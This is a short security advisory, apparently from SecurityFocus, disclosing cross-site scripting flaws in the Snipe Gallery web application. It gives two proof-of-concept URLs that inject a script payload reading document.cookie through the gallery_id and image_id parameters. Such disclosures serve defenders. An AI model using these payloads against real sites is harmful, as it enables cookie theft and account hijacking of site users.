Snipe Gallery Multiple Cross-Site Scripting Vulnerabilities

This issue can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[PATH]/view.php?gallery_id='><script>alert(document.cookie)</script>
http://www.example.com/[PATH]/image.php?page=1&gallery_id=980&image_id='><script>alert(document.cookie)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus